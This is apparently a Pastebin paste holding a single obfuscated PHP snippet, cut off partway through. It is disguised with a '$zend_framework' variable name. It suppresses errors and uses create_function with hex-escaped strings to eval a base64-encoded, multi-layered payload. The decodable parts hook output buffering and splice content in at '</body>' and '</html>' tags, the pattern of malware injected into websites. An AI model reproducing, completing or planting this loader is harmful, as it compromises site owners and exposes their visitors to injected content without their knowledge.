Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62YTFmWTJiYWsxY3owaXIgPSAiXHg2NlwxNjVceDZlXDE0M1x4NzRcMTUxXHg2ZlwxNTZceDVmXDE0NVx4NzhcMTUxXHg3M1wxNjRceDczIjsgJGV2YTFmWTJiYWwxY3owaXIgPSAiXHg2ZlwxNDJceDVmXDE2M1x4NzRcMTQxXHg3MlwxNjQiOyAkZXZhMWZZMmJhbDFjejhpciA9ICJceDYzXDE1N1x4NjRcMTQ1XHg3OFw2Mlx4MzIiOyBpZigkZXZhMWZZMmJhazFjejBpcigkZXZhMWZZMmJhbDFjejBpcikgJiYgIWlzc2V0KCRHTE9CQUxTWyRldmExZlkyYmFsMWN6OGlyXSkpIHsNCgkkR0xPQkFMU1skZXZhMWZZMmJhbDFjejhpcl09MTsgCWlmKCEkZXZhMWZZMmJhazFjejBpcigiXHg2NVwxNjZceDYxXDYxXHg2NlwxMzFceDMyXDE0Mlx4NjFcMTUzXHgzMVwxNDNceDU2XDYyXHg2OVwxNjIiKSkgeyBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjVcMTY2XHg2MVw2MVx4NjZcMTMxXHgzMlwxNDJceDYxXDE1M1x4MzFcMTQzXHg1Nlw2MFx4NjlcMTYyIikpIHsNCiBmdW5jdGlvbiBldmExZlkyYmFrMWNWMGlyKCkgew0KIC8vZWNobyBzdGFydA0KDQogaWYoIWlzc2V0KCRHTE9CQUxTWyJhZ2hleDAiXSkpIHsNCgkkR0xPQkFMU1siYWdoZXgwIl09MTsNCiAkZXZhbHNzc2dxdWxWQlRrWkxBY2ggPSAiIjsNCiBpZiAoIWlzc2V0KCRldmExZllsYmFrQmNWU2lyKSkgeyRldmExZllsYmFrQmNWU2lyID0gIjdreUo3a1NLaW9EVFdWV2VSQjNUaWNpTDFVamNtUmlMbjRTS2lBRVRzOTBjdVpsVHo1bVJPdEhXSGRXZlJ0MFp1cG1WUk5UVTJZMk1WWmtUOGgxUm4xWFVMZG1icXhHVTdoMVJuMVhVTGRtYnFaVlV6RWxObU5UVkd4RWVOdDFaemtGY21KeUp1VVROeVpHSnVjaUx4azJjd1JDTGlJQ0t1VkhkbEpISm40U055a21ja1JpTG5zVEtuNGlJbklpTG5Ba2RYNVVjMmRsVHNoRWNNaEhUOHhGZU14MlQ0eGpXa05UVXdWR05kVnpXdlYxV2M5V1Qyd2xicVpWWDNsRWNsaFRUS2RXZjhvRVp6a1ZOZHAyTndaR05WdFZYOGRtUlBGM04xVTJjVlpEWDRsVmNkbFdXS2QyYVpCblp0VkZmTkozTjFVMmNWWkRYNGxWY2RsV1dLZDJhWkJuWnRWa1ZUcEdUWEIxSnVJVE55WkdKdUl5Smk0U04xSW5aazR5SnVreUp1SXlKaTR5SjY0R2ZOcGpiV0JWZElkMFQ3TmpWUUpIVndWMmFOWnpXelFqU01oWFRiZDJNWkJuWnhwSGZORm5hc1ZXZXZwMFp0aGpXbkJIUFoxMU1KcFZYOEZsU014RFJXQjFKdUlUTnlaR0p1SXlKaTRTTjFJblprNHlKdWt5SnVJeUppNHlKQVozVk9GbmRYNUVlTnQxWnprRmNtNW1hV0ZsYjBvRVQ0MTBXbk5UV3daV2M2eFhUNDEwV25OVFd3Wm1ibVprVDR4aldrTlRVd1ZHTmRWeld2VjFXYzlXVDJ3bGF6Y0VUbjRpTTFJblprNHlKbjRpSW5JaUwxVWpjbVJpTG40U0tpQWtkWDVVYzJkbFQ5cG5SUVozTndaR05WdFZYOFZsUk94WFYyWUdiWlpqWjR4a1ZQeFdXMWNHYkV4V1o4bDFTbjlXVDIwa2RteFdaOGwxU245V1RMMVVjcXhXWjU5bVNuMUdPYWRHYzhrVlh6a2tXZHhYVUt4RVBFeEdVbjRpTTFJblprNHlKaWNpTDFVamNtUmlMbjBUTXBOSGNrc1RLaWNpTHlVVGF5WkdKdWNTTjN3Vk0xZ0hYMlFUTWNkek00eDFNMUVEWHpVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjJFRFg1WURlY0ZUTXh3Vk8yZ0hYM1FUTWNOVE40eGxNekVEWGlaRGVjRnpOY2RETjR4bE0wRURYM2NEZWNGak5jZFRONHhWTTBFRFhtWkRlY1ZqTXh3MU4wZ0hYeU1UTWNaek40eGxOeEVEWDNVRGVjSnpNeHdsWTJnSFh4Y0RYMlFEZWNaVE14d2xNemdIWDFJVE1jSnpNNHgxTTBFRFg0WURlY0pUTXh3MU4wZ0hYeEVUTWNWek40eGxNeEVEWDRVRGVjUkROeHdGTXpnSFgySVRNY1JtTjR4MU0wRURYM01EZWNOVE54d1ZPMmdIWHlRVE1jWnpONHhsTXlFRFg0VURlY0ZETnh3VlkyZ0hYMVlEWDNVRGVjUkROeHdGWjJnSFh5SVRNY05ETjR4Vk14RURYemNEZWNSak5jUm1ONHgxTTBFRFh4TURlY0pqTXh3Rk8xZ0hYeU1UTWNsek40eGxNeUVEWHpRRGVjTlRNeHdsTTNnSFh3Y1RNY2RUTjR4Vk16RURYek1EZWNGek5jWlRONHhWTjBFRFg0WURlY0pUTXh3VloyZ0hYelFUTWNoak40eEZOMkVEWDBVRGVjTlRNeHdWTjNnSFh5RVRNY2hUTjR4Rk4wRURYd01EZWNaak14d0ZaMmdIWHpRVE1jSm1ONHgxTjBFRFh6UURlY1JETnh3Rk0zZ0hYd2NUTWNkRE40eDFNMEVEWGhkRGVjRnpOY05tTjR4MU0wRURYd01EZWNaVE14d0ZPMGdIWHhFVE1jbHpNNHhWTXdFRFg1WURlY0pETnh3Vk8zZ0hYMklUTWNkaUwxSVRheVpHSnVjeU56Z0hYelVUTWNsak40eFZNeEVEWDNNRGVjTlROeHdWTzNnSFgxRVRNY1J6TjR4MU0xRURYNVlEZWNKRE54d2xOM2dIWDBVVE1jZERONHhGTjBFRFhoWkRlY1ZqTmNkVE40eEZOMEVEWGtaRGVjSlRNeHdWTzJnSFgwRVRNY2xqTjR4Vk15RURYelFEZWNOVE14d2xZMmdIWHlFVE1jTnpNNHhsTTBFRFhtWkRlY0ZUTXh3Rk8wZ0hYeFFUTWNGbU40eGxNd0VEWHpVRGVjQmpNeHcxTjJnSFgwWURYeU1EZWNKRE54d0ZNM2dIWHlJVE1jTnpNNHhWTXpFRFgxY0RlY1pqTXh3VloyZ0hYeU1UTWNsak40eEZOMndWTzJnSFh4RVRNY0ptTjR4Vk14RURYelFEZWNSVE14d1ZPMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY2xqTjR4Rk4yd1ZPMmdIWHhFVE1jSm1ONHhWTXpFRFg1WURlY0ZUTXh3bFoyZ0hYMFlEWHlNRGVjSkROeHdGTTNnSFh5SVRNY056TTR4Vk16RURYMWNEZWNaak14d1ZaMmdIWHlNVE1jWmpONHhsTnlFRFgzUURlY1JETnh3Rk8yZ0hYMklUTWNSbU40eDFNMEVEWGhaRGVjSkRNeHcxTTFnSFh3SVRNY2RqTjR4Rk4yd2xNemdIWHlRVE1jQnpNNHhGTjFFRFh5TURlY0Z6TXh3Vk4zZ0hYMklUTWNWbU40eGxNekVEWGlaRGVjTmpOeHdGTzBnSFh4RVRNY0J6TjR4Rk4yd0ZaMmdIWHpRVE1jRnpNNHhsTXlFRFg0VURlY0p6TXh3Vk8zZ0hYeUlUTWNORE40eDFNeEVEWDFjRGVjWmpNeHdWWjJnSFh6UVRNY0J6TTR4bE55RURYa1pEZWNORE54dzFOMmdIWDBZRFh5TURlY0pETnh3Rk0zZ0hYeUlUTWNOek00eFZNekVEWDFjRGVjWmpNeHdWWjJnSFh5TVRNY0ppTG40U055SW5aazR5SnpZVE1jRjJONHhsTXhFRFgxY0RlY1pqTXh3VloyZ0hYelFUTWNCek00eGxOeUVEWGtaRGVjTkROeHdWWjJnSFh3WURYaFpEZWNKRE54d1ZNemdIWHlFVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMblV6TmNkek40eDFOeEVEWGxaRGVjUmpOY0p6TTR4bE0wRURYd2NEZWNKak14dzFNemdIWHhNVE1jVnpONHhsTnlFRFhsWkRlY0p6TXh3bE4yZ0hYMklUTWNkRE40eEZOMEVEWDRZRGVjWmpNeHdGWjJnSFh6UVRNY0ZtTjR4Rk4wRURYelVEZWNCak14d1ZOM2dIWDJJVE1jZGlMMUlUYXlaR0p1Y2lJdWNpTDFJamNtUmlMbk1qTnh3VlkzZ0hYeUVUTWNObU40eGxOeEVEWDNVRGVjRnpNeHcxTTNnSFh5QVRNY2hUTjR4bE16RURYNWNEZWNGek5jRnpNNHhsTXpFRFhqWkRlY0pUTXh3Rk8wZ0hYelFUTWNWbU40eEZNMndWWTJnSFh5UVRNY2x6TjR4bE53RURYM1FEZWNSRE54dzFZMmdIWHlFVE1jaERONHhsTXhFRFhpNGlNMVFYYW1SQ0x5VWpacFpHSnNVak1tbG1aa2dTWmpGR2J3Vm1jZmRXWnlCM09pSWpNNHhGTTF3Vk4yZ0hYMFFUTWNabU40eDFNMEVEWDFZRGVjUkROeHdsWjFnSFgwWURYMk1EZWNWRE54dzFNM2dIWHhRVE1jSmpONHhGTTF3MVkyZ0hYeFFUTWNaek40eFZOMEVEWHdRRGVjSkNJOUFpTTFRWGFtUnlPaUkyTTR4Vk0xd2xNeWdIWHhZRFhqVkRlY0pETmNoak00eEZOMUVEWHhZRGVjWmpOeHdWTjJnSFhpQVNQZ0lUTm1sbVprc2pJMVFUTWNsak40eEZNd0VEWDVJRGVjTlROY1ZtTTR4Rk0xd0ZNMGdIWGlBU1BnVWpNbWxtWmtjQ0tzRm1kbHRqSXdJRGVjVnpOY0JqTTR4Rk0yd0ZOMmdIWDBRVE1jUmpNNHhsSWcwREkxSVRheVJHSmdzVE4xa21jbVJpTG5raUluNGlNMWttY21SQ0k5QVNOeUluWmtBeU9uZ0RONHhGTjBFRFhqWkRlY0pUTXh3Rk8wZ0hYeUVUTWNkQ0k5QVNOeWttY21SeU9uSTJNNHhWTTF3Vk95Z0hYeVFEWGtORGVjZENJOUFpTTFrbWNtUnlPblFEVjJZV2ZWdFVUbkFTUGdJVE55WkdKN2NDS3VWbmMwVm1ja2NDSTlBU04xSW5aa3N6SnlVRGRwWkdKc0lUTm1sbVprd1NOeVlXYW1SQ0t1SlhZMFZtY2tzekpnMERJMVVUYXlaR0orYVdZZ0tDRnBjM05sZENna1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVEtTa2dlMloxYm1OMGFXOXVJR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KSE1wZXlSbElEMGdJaUk3SUdadmNpQW9KR0VnUFNBd095QWtZU0E4UFNCemRISnNaVzRvSkhNcExURTdJQ1JoS3lzZ0tYc2taU0F1UFNBa2MzdHpkSEpzWlc0b0pITXBMU1JoTFRGOU8zMXlaWFIxY200b0pHVXBPMzFsZG1Gc0tHVjJZV3hzZDJoV1prbFdibGRRWWxRb0p6c3BLU0k5UVZObU4ydDVZVTVTYldKQ1VsaFhkazV1VW1wR1ZWZEtlRmRaTWxaSFNtOVZSMXAyVGxkYWF6bEdUakpWTW1Ob1NrZEpkVXBZWkRCV2JXTTNRbE5MY2pGRlduVkdSV1JhT1RKalIwNVhVVnBzUldKb1dsaGFhMmRwVWxSS2ExcFFiREJhYUZKR1lsQkNSbUZQTVVWaWFGcFlXbWMwTW1Kd1VqTlpkVlp1V2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNU1FVlRhMmh0VlhwTmJVbHZXVEJWUTFveVZFcGtWMWxWZURKVVVXaHRWRTU0VjFreVZsZFFXRTVHV201T1JWcFdiRlpoUms1V1ltaDRWMWt5VmtkS0lpaGxaRzlqWldSZk5EWmxjMkZpS0d4aGRtVW5LU2s3WlhaaGJDaGxkbUZzYkhkb1ZtWkpWbTVYVUdKVUtDYzdLU2tpTjJ0cFNUa3dWRkZxUW1wVlNVWnRTVzlaTUZWRFdqSlVTbVJYV1ZWNE1sUlJhRzFVVG5oWFdUSldWMUJZV2xaamFGcHNZM0JXTWxaVmVGZFpNbFpIU2lJb1pXUnZZMlZrWHpRMlpYTmhZaWhzWVhabEp5a3BPMlYyWVd3b1pYWmhiR3gzYUZabVNWWnVWMUJpVkNnbk95a3BJamRyYVVrNVVYcFdhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3d4YWxGdGFFWlNWbVJGWkdsV1JscERlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdTVk5RT1VWV1V6SlNNbFpLU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRGVVdsWndibEoxVmpKUmMwb3laRko0VjFreVZrZEtJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVXSEJKVTFZeFZXeFZTVnBGVFZsT2JGWjNWV3hXTlZsVlZsWktiRkpVU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkhSc1ZVWmFiRlZHVGpGWWF6QjZVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLSWlobFpHOWpaV1JmTkRabGMyRmlLR3hoZG1VbktTazdaWFpoYkNobGRtRnNiSGRvVm1aSlZtNVhVR0pVS0NjN0tTa2lQWE5VUzNCcmFXTnhUbXhXYWtZd1lXaFNSMWRhVWxoTmFGcFlXbXRuYVdSc1NtNWpNRTVJUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hvUTJKb1dsaGFJaWhsWkc5alpXUmZORFpsYzJGaUtHeGhkbVVuS1NrN1pYWmhiQ2hsZG1Gc2JIZG9WbVpKVm01WFVHSlVLQ2M3S1NraVBYTlVTM0JKVTFBNVl6SlpjMmhZWWxwU2JsSjBWbXhKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU1hOcmFVa3dXVEZTWVZadVVsaGtiRWx2V1RCVlExb3lWRXBrVjFsVmVESlVVV2h0VkU1NFYxa3lWa2RKYzJ0cFNUbHJSVmRoU2tSaVNFWnRZVXRvVmxkdFdqQldhRXBEUzBkT2JGRnRPVlZUYmtaSFZuTTVSVlZ2TlZWVWMwWnRaR3hDUTB4d1NVTk5OVEJYVlZBMWExWlZTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRUpEVEhCSlUxQkNOVEpaZUdkdVRWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNRa05NY0VsRFlqUkthbGN5YkdwTlUwcERTMGRPYkZGdE9WVlRia1pIVm5NNVJWVnZOVlZVYzBadFpHeG9VMlZvU201amFFSlRVR2RSU0ZWRmFESmllbVJGWkhWU1JXUlZlRmRaTWxaSFNpSW9aV1J2WTJWa1h6UTJaWE5oWWloc1lYWmxKeWtwTzJWMllXd29aWFpoYkd4M2FGWm1TVlp1VjFCaVZDZ25PeWtwSWowOWQwOXdhMmxKTlZGSVZreHdibFZFZEd0bFV6VnRXWE5LYkdKcFdtNVVlV2RHVFZkS2FsZHRXakZTYVVKdVYwaEdNVm93TURKWmVFbEdWMkZzU0dSSmJFVmpUbWhyVTNaU1ZHSlNNV3RVZVVsc1UzTkNSRlpoV2pCTmFIQnJVMVpTYkZKcldtdFpiM0JHVjJGa1IwNTVTVWRqVTA1VVZ6RmFiR0poU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkdoRFltaGFXRm9pS0dWa2IyTmxaRjgwTm1WellXSW9iR0YyWlNjcEtUdGxkbUZzS0dWMllXeHNkMmhXWmtsV2JsZFFZbFFvSnpzcEtTSTlQWGRQY0dkRFRXdFNSMHBuTUVSSldYQklVbmxvTVZSSlpESlRibmhYV1RKV1Iwb2lLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1R0bGRtRnNLR1YyWVd4c2QyaFdaa2xXYmxkUVlsUW9KenNwS1NJOVBWRm1PWFJVV0hoelJtRnFSa1ZVWVhSSFZrTmFSbUl4UmpOYWVrNHpZM05HYldSc1VrTkpPVUZEWVdwR1JWUmhkRWRXUTFwR1lqRkdNMXA2VGpOamMwWnRaR3hTUTBrM2EwTmhha1pGVkdGMFIxWkRXa1ppTVVZelducE9NMk56Um0xa2JGSkRUR3hXYkdWSE5WZGFSSGh0V1ROR1JtSm9XbGhhYTJkVFdtczVSMkozYUZoYVp6QkVTVzlPVjFGTmNERmhWVXByVm5OV1dHTnVUak5qZW5oWFdUSldSMG8zYkZOTGJGWnNaVWMxVjFwRWVHMVpNMFpHWW1oYVdGcHJkME5oYWtaRlZHRjBSMVpEV2taaU1VWXpXbnBPTTJOelJtMWtiRkpEUzNsU00yTjVVak5qYjBGcFduQjBWRXR3TUZaTGFWVnNWSGhSVmxNMVdWVldWa3BzVWxSS1EwdEhUbXhSYlRsVlUyNUdSMVp6T1VWVmJ6VlZWSE5HYldSc2RHeFZSbHBzVlVaT01WaHJaMU5hYXpreVdYVldSMko1Vm01TWNFbFRUMjR4YlZOcFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdDVVVzFPTWxwT1FtNWtjRTVZVkhsNFYxa3lWa2RLYjFWSFduWk9iV0pzZUcxak1UVlRTMmxyVkZOMGNHdEpiMWt3VlVOYU1sUktaRmRaVlhneVZGRm9iVlJPZUZkWk1sWnRUR1JzYVVrNWEydFNVMVpyVW5kbmJGSlRSa1JXVDFveFlWWktRMHRIVG14UmJUbFZVMjVHUjFaek9VVlZielZWVkhOR2JXUnNkR3hWUmxwc1ZVWk9NVmhyTkZOTGFUQkVUVlZHYlVsdldUQlZRMW95VkVwa1YxbFZlREpVVVdodFZFNTRWMWt5Vm0xTWNFbFRVRFJSTUZscFoybFNWRXByV2xCc01GcG9Va1ppVUVKR1lVOHhSV0pvV2xoYWRXdHBTWFpLYTJKTlNrTkxSMDVzVVcwNVZWTnVSa2RXY3psRlZXODFWVlJ6Um0xa2JEVnBVVzFvUmxKV1pFVmthVlpHV2tONFYxa3lWa2RLZFd0cFNUa3dlbVJOU2tOTFIwNXNVVzA1VlZOdVJrZFdjemxGVlc4MVZWUnpSbTFrYkRWRFZ6WlNhMk5aT1VWVGJuUXdXbk5HYldSc1VtbE1jRWxUVURSclNGUnBaMmxTVkVwcldsQnNNRnBvVWtaaVVFSkdZVTh4UldKb1dsaGFkV3RwU1Rrd2VscFFTa05MUjA1c1VXMDVWVk51UmtkV2N6bEZWVzgxVlZSelJtMWtiRFY1VmxkR1dGbFhTbGhoYkdSR1ZuTkdiV1JzVWtOTGRVcEZWR3BrVlZOS09WVlhlSFJYVTBNeFZWSlllRmRaTWxaSFNUbEJRMkZxUmtWVVlYUkhWa05hUm1JeFJqTmFlazR6WTNOR2JXUnNVa05KTjJ0RFRYZG5SRTE0YzFOTGIxVlhZbkJTU0V4d2EybEpPVEJGVTJ0b2JWVjZUVzFKYjFrd1ZVTmFNbFJLWkZkWlZYZ3lWRkZvYlZST2VGZFpNbFpIU3pGUlYySnpZekZWYTJReVVXdFdWbGR3VmpCVmRFWkhZbWhhV0ZwcloxTmFjSFF5WW5aT1IyUnNUa2hSWjNOSVNXeE9TR0pzUWxObU4wSlRTM0JyVTFoWVRrWmFiazVGV2xac1ZtRkdUbFppYUhoWFdUSldSMHBpVmxWVFREa3dWRVE1UmtwdlVWaGFlazVZWVc5QmFXTjJRbE5MY0UxcldtcGtWMVIzV2xoaGVqRnJZM05HYldSc1VrTkpjMGxUWVhaSlEwbDFRVk5MTUVKR1VtODVNbU5JVW01aVJWSklWbk5HYldSc1VrTkpjMGxEWm1sblUxcHJPVWRpZHpGWFlXYzBRMGxwT0dsSmIyY3lXVEJHVjJKbVpGZGFlVUpJUzI5WlYyRWlLR1ZrYjJObFpGODBObVZ6WVdJb2JHRjJaU2NwS1Rza1pYWmhiRlZrUTFoVVJGRkZVbTFYYmtSVElEMHhPRGM1TWp0OSI7JGV2YTF0WWxiYWtCY1ZTaXIgPSAiXHg2NVwxNDRceDZmXDE1NFx4NzBcMTcwXHg2NSI7JGV2YTF0WWxkYWtCY1ZTaXIgPSAiXHg3M1wxNjRceDcyXDE2Mlx4NjVcMTY2IjskZXZhMXRZbGRha0JvVlMxciA9ICJceDY1XDE0M1x4NjFcMTU0XHg3MFwxNDVceDcyXDEzN1x4NjdcMTQ1XHg3MlwxNjAiOyRldmExdFlpZG9rQm9WU2pyID0gIlx4M2JcNTFceDI5XDEzNVx4MzFcMTMzXHg3MlwxNTJceDUzXDEyNlx4NjNcMTAyXHg2YlwxNDFceDY0XDE1MVx4NTlcMTY0XHgzMVwxNDFceDc2XDE0NVx4MjRcNTBceDY1XDE0NFx4NmZcMTQzXHg2NVwxNDRceDVmXDY0XHgzNlwxNDVceDczXDE0MVx4NjJcNTBceDZjXDE0MVx4NzZcMTQ1XHg0MFw3Mlx4NjVcMTY2XHg2MVwxNTRceDI4XDQyXHg1Y1w2MVx4MjJcNTFceDNiXDcyXHg0MFw1MFx4MmVcNTNceDI5XDEwMFx4NjlcMTQ1IjskZXZhMXRZbGRva0JjVlNqcj0kZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZbGRha0JvVlMxcik7JGV2YTF0WWxkYWtCY1ZTanI9JGV2YTF0WWxkYWtCY1ZTaXIoJGV2YTF0WWxiYWtCY1ZTaXIpOyRldmExdFlpZGFrQmNWU2pyID0gJGV2YTF0WWxkYWtCY1ZTanIoY2hyKDI2ODcuNSowLjAxNiksICRldmExZllsYmFrQmNWU2lyKTskZXZhMXRZWGRha0FjVlNqciA9ICRldmExdFlpZGFrQmNWU2pyWzAuMDMxKjAuMDYxXTskZXZhMXRZaWRva0JjVlNqciA9ICRldmExdFlsZGFrQmNWU2pyKGNocigzNjI1KjAuMDE2KSwgJGV2YTF0WWlkb2tCb1ZTanIpOyRldmExdFlsZG9rQmNWU2pyKCRldmExdFlpZG9rQmNWU2pyWzAuMDE2Kig3ODEyLjUqMC4wMTYpXSwkZXZhMXRZaWRva0JjVlNqcls2Mi41KjAuMDE2XSwkZXZhMXRZbGRha0JjVlNpcigkZXZhMXRZaWRva0JjVlNqclswLjA2MSowLjAzMV0pKTskZXZhMXRZbGRha0JjVlNpciA9ICIiOyRldmExdFlsZGFrQm9WUzFyID0gJGV2YTF0WWxiYWtCY1ZTaXIuJGV2YTF0WWxiYWtCY1ZTaXI7JGV2YTF0WWlkb2tCb1ZTanIgPSAkZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZbGRha0JjVlNpciA9ICJceDczXDE2NFx4NzJceDY1XDE0M1x4NzJcMTYwXDE2NFx4NzIiOyRldmExdFlsYmFrQmNWU2lyID0gIlx4NjdcMTQxXHg2ZlwxMzNceDcwXDE3MFx4NjUiOyRldmExdFlsZGFrQm9WUzFyID0gIlx4NjVcMTQzXHg3MlwxNjAiOyRldmExdFlsZGFrQmNWU2lyID0gIiI7JGV2YTF0WWxkYWtCb1ZTMXIgPSAkZXZhMXRZbGJha0JjVlNpci4kZXZhMXRZbGJha0JjVlNpcjskZXZhMXRZaWRva0JvVlNqciA9ICRldmExdFlsYmFrQmNWU2lyO30gfSAgDQogDQogcmV0dXJuICRldmFsc3NzZ3F1bFZCVGtaTEFjaDsgICB9IH0NCiBpZighJGV2YTFmWTJiYWsxY3owaXIoIlx4NjdcMTcyXHg2NFwxNDVceDYzXDE1N1x4NjRcMTQ1IikpIHsNCiBmdW5jdGlvbiBnemRlY29kZSgkZXZhMWZZMmJvMDF6bzgxNykgeyAkZXZhMWZZMmJhbDFjejhpNCA9ICJceDczXDE2NFx4NzJcMTYwXHg2ZlwxNjMiOyAkZXZhMWZZMmJvbDFjejhpNSA9ICJceDczXDE2NVx4NjJcMTYzXHg3NFwxNjIiOyAkZXZhMWZZMmJvMTFjejhpNSA9ICJceDc1XDE1Nlx4NzBcMTQxXHg2M1wxNTMiOyAkZXZhMWZZMmJvMWxjejhpNSA9ICJceDYzXDE1MFx4NzIiOyAkZXZhMWZZMmJvMWx6YzhpNSA9ICJceDY3XDE3Mlx4NjlcMTU2XHg2NlwxNTRceDYxXDE2NFx4NjUiOw0KICRldmExZlkyYm8wMXpvMzE3PUBvcmQoQCRldmExZlkyYm9sMWN6OGk1KCRldmExZlkyYm8wMXpvODE3LDMsMSkpOw0KICRldmExZlkyYm8wMWMwMzE3PTEwOyAgaWYoJGV2YTFmWTJibzAxem8zMTcmNCkgew0KICRldmExZlkyYm8wMXowMzE3PUAkZXZhMWZZMmJvMTFjejhpNSgndicsJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsMTAsMikpOw0KICRldmExZlkyYm8wMXowMzE3PSRldmExZlkyYm8wMXowMzE3WzFdOw0KICRldmExZlkyYm8wMWMwMzE3Kz0yKyRldmExZlkyYm8wMXowMzE3Ow0KIH0gIGlmKCRldmExZlkyYm8wMXpvMzE3JjgpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMTYpIHsNCiAkZXZhMWZZMmJvMDFjMDMxNz1AJGV2YTFmWTJiYWwxY3o4aTQoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzFsY3o4aTUoMCksJGV2YTFmWTJibzAxYzAzMTcpKzE7DQogfSAgaWYoJGV2YTFmWTJibzAxem8zMTcmMikgew0KICRldmExZlkyYm8wMWMwMzE3Kz0yOw0KIH0gICRldmExZlkyYm8wMWMwM2E3PUAkZXZhMWZZMmJvMWx6YzhpNShAJGV2YTFmWTJib2wxY3o4aTUoJGV2YTFmWTJibzAxem84MTcsJGV2YTFmWTJibzAxYzAzMTcpKTsgIGlmKCRldmExZlkyYm8wMWMwM2E3PT09RkFMU0UpIHsNCiAkZXZhMWZZMmJvMDFjMDNhNz0kZXZhMWZZMmJvMDF6bzgxNzsNCiB9ICByZXR1cm4gJGV2YTFmWTJibzAxYzAzYTc7DQogfSB9DQogZnVuY3Rpb24gZXZhMWZZMmJhazFjVjJpcigkdmFyNikgeyAkZXZhMWZZMmIwMWx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNjJceDY1XDE2MFx4NmNcMTQxXHg2M1wxNDUiOyAkZXZhMWZZMmIwbGx6YzhsNSA9ICJceDcwXDE2Mlx4NjVcMTQ3XHg1ZlwxNTVceDYxXDE2NFx4NjNcMTUwIjsgJGV2YTFmWTJiMDIyemM4bDUgPSAiXHg0OFwxNDVceDYxXDE0NFx4NjVcMTYyIjsgJGV2YTFmWTJiMDIyem84bDUgPSAiXHg2N1wxNzJceDY0XDE0NVx4NjNcMTU3XHg2NFwxNDUiOyAkZXZhMWZZMmIwNTJ6bzhsNSA9ICJceDQzXDE1N1x4NmVcMTY0XHg2NVwxNTZceDc0XDU1XHg0NVwxNTZceDYzXDE1N1x4NjRcMTUxXHg2ZVwxNDdceDNhXDQwXHg2ZVwxNTdceDZlXDE0NSI7ICRldmExZlkyYjA1MnpvOGwxID0gIlx4MmZcMTM0XHgzY1wxMzRceDJmXDE0Mlx4NmZcMTQ0XHg3OVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYyem84bDEgPSAiXHgyZlw1MFx4NWNcNzRceDVjXDU3XHg2MlwxNTdceDY0XDE3MVx4NWJcMTM2XHg1Y1w3Nlx4NWRcNTJceDVjXDc2XHgyOVw1N1x4NzNcMTUxIjsgJGV2YTFmWTJiMDYxem84bDEgPSAiXHgyZlwxMzRceDNjXDEzNFx4MmZcMTUwXHg3NFwxNTVceDZjXDU3XHg3M1wxNTEiOyAkZXZhMWZZMmJvNjF6bzhsMSA9ICJceDJmXDUwXHg1Y1w3NFx4NWNcNTdceDY4XDE2NFx4NmRcMTU0XHg1YlwxMzZceDVjXDc2XHg1ZFw1Mlx4NWNcNzZceDI5XDU3XHg3M1wxNTEiOyAkZXZhMWZZMmIwMjJ6YzhsNSgkZXZhMWZZMmIwNTJ6bzhsNSk7ICRldmExZlkyYm82MXpvOGw3PSRldmExZlkyYjAyMnpvOGw1KCR2YXI2KTsgIGlmKCRldmExZlkyYjBsbHpjOGw1KCRldmExZlkyYjA1MnpvOGwxLCRldmExZlkyYm82MXpvOGw3KSkgew0KIHJldHVybiAkZXZhMWZZMmIwMWx6YzhsNSgkZXZhMWZZMmIwNjJ6bzhsMSwgZXZhMWZZMmJhazFjVjBpcigpLiJcbiIuIlx4MjRcNjEiLCAkZXZhMWZZMmJvNjF6bzhsNywxKTsgfSBlbHNlIHsNCiBpZigkZXZhMWZZMmIwbGx6YzhsNSgkZXZhMWZZMmIwNjF6bzhsMSwkZXZhMWZZMmJvNjF6bzhsNykpIHsNCiByZXR1cm4gJ